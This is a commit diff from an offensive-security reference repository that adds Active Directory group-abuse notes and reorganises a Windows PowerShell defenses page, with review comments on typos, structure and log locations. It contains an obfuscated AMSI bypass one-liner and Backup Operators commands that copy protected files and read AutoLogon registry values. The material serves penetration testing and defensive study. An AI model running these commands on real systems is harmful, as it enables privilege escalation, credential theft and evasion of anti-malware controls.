mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
AD Groups + PowerShell Defenses
This commit is contained in:
parent
f1a85f22b9
commit
36e135776f
@ -92,8 +92,11 @@
- [ADFS - Golden SAML](#adfs---golden-saml)
- [UnPAC The Hash](#unpac-the-hash)
- [Shadow Credentials](#shadow-credentials)
- [Active Directory Groups](#active-directory-groups)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
- [Abusing Schema Admins Group](#abusing-schema-admins-group)
- [Abusing Backup Operators Group](#abusing-backup-operators-group)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
- [GenericAll](#genericall)
- [GenericWrite](#genericwrite)
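Review bot: `Dangerous Built-in Groups Usage`, `Abusing DNS Admins Group`, `Abusing Schema Admins Group` and `Abusing Backup Operators Group` are `###` subsections of the new `## Active Directory Groups` section introduced later in this change, so their list entries belong one indentation level under `- [Active Directory Groups](#active-directory-groups)`. This rendered view flattens list indentation, so please confirm the nesting in the raw markdown before merging.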
@ -2854,6 +2857,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
```

## Active Directory Groups

### Dangerous Built-in Groups Usage

@ -2927,6 +2931,42 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
sc \\dc01 start dns
```

### Abusing Schema Admins Group

> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.


### Abusing Backup Operators Group

> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.

This groups grants the following privileges :
- SeBackup privileges
- SeRestore privileges

* Get members of the group:
```ps1
PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
```ps1
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege
Get-SeBackupPrivilege
```
* Retrieve sensitive files
```ps1
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
```
* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
```ps1
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
```


### Abusing Active Directory ACLs/ACEs
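Review bot: the new `### Abusing Schema Admins Group` section is a stub, a quoted definition and nothing else, not even the `Get-NetGroupMember` enumeration line that the Backup Operators section gets; either fill it in or leave the empty heading out of this commit. In the Backup Operators text, `This groups grants the following privileges :` should read `This group grants the following privileges:`, and the two bullets should name the actual privilege constants, `SeBackupPrivilege` and `SeRestorePrivilege`, which is also how the linked SeBackupPrivilege module refers to them. The remote-registry snippet hard-codes a lab hostname (`dc.htb.local`); a placeholder such as `<dc-hostname>` reads better in a reference page, and it is worth stating next to the `Get-NetGroupMember` line that a non-empty Backup Operators group on a domain controller is itself a finding worth reviewing, since the quoted text says the group is empty by default.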
@ -4192,3 +4232,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/)
@ -2,26 +2,17 @@

## Summary

* [AMSI](#amsi)
* [AppLocker](#applocker)
* [DPAPI](#dpapi)
* [Powershell](#powershell)
* [JEA](#jea)
* [Anti Malware Scan Interface](#anti-malware-scan-interface)
* [Just Enough Administration](#just-enough-administration)
* [Contrained Language Mode](#constrained-language-mode)
* [Script Block Logging](#script-block-logging)
* [Windows Defender Antivirus](#windows-defender-antivirus)
* [Windows Defender Application Control](#windows-defender-application-control)
* [Windows Defender Firewall](#windows-defender-firewall)

## AMSI

> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.

Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```


## AppLocker
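Review bot: `* [Contrained Language Mode](#constrained-language-mode)` still misspells the link text (the anchor itself is right); fix it while this list is being touched. The `## AMSI` section shown here (quote, bypass link and the one-liner) reappears verbatim under `### Anti Malware Scan Interface` in the next hunk, and this view hides the +/- markers, so confirm the block is being removed here rather than duplicated. Likewise, if `* [Powershell](#powershell)` and `* [JEA](#jea)` survive this change, `JEA` duplicates the new `Just Enough Administration` entry and the two should be reconciled.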
@ -48,7 +39,18 @@ Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrep

## Powershell

### JEA
### Anti Malware Scan Interface

> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.

Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)

```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```


### Just Enough Administration

> Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information.
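Review bot: a bare `### JEA` heading sits directly above `### Anti Malware Scan Interface` with no body, while `### Just Enough Administration` gets its own heading and description further down in this hunk. That stray heading should be the line this change removes; with the +/- markers hidden in this view, please confirm it does not survive. Separately, consider whether the AMSI section belongs under `## Powershell` at all: the quoted description presents AMSI as a general Windows API used by any application, so a top-level section (as it was before, per the previous hunk) fits the text better than a PowerShell subsection.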
@ -62,6 +64,7 @@ Breaking out if JEA:
Add-Computer
```


### Constrained Language Mode

Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
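Review bot: the context line `Breaking out if JEA:` carries a typo (`of JEA`); since this hunk only inserts a blank line ahead of the `### Constrained Language Mode` heading, it is a convenient moment to fix it in the same commit.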
@ -110,6 +113,29 @@ Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageM
```


### Script Block Logging

> Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel.

Enable Script Block Loggin:

```ps1
function Enable-PSScriptBlockLogging
{
$basePath = 'HKLM:\Software\Policies\Microsoft\Windows' +
'\PowerShell\ScriptBlockLogging'

if(-not (Test-Path $basePath))
{
$null = New-Item $basePath -Force
}

Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"
}
```



## Windows Defender Antivirus

Also known as `Microsoft Defender`.
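Review bot: the quoted description points defenders at the wrong log: script block logging records (event ID 4104) are written to the `Microsoft-Windows-PowerShell/Operational` log, not to the classic `Windows PowerShell` channel, so the two mentions of that channel should be corrected before someone goes looking there during an investigation. `Enable Script Block Loggin:` is missing its `g`. It is also worth a sentence next to `Enable-PSScriptBlockLogging` that the key it writes lives under `HKLM:\Software\Policies`, the policy hive, so in a domain-joined environment the setting should be enforced through Group Policy rather than set by hand, otherwise the next policy refresh can override it.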
@ -187,3 +213,4 @@ Also known as `WDAC/UMCI/Device Guard`.
## References

* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)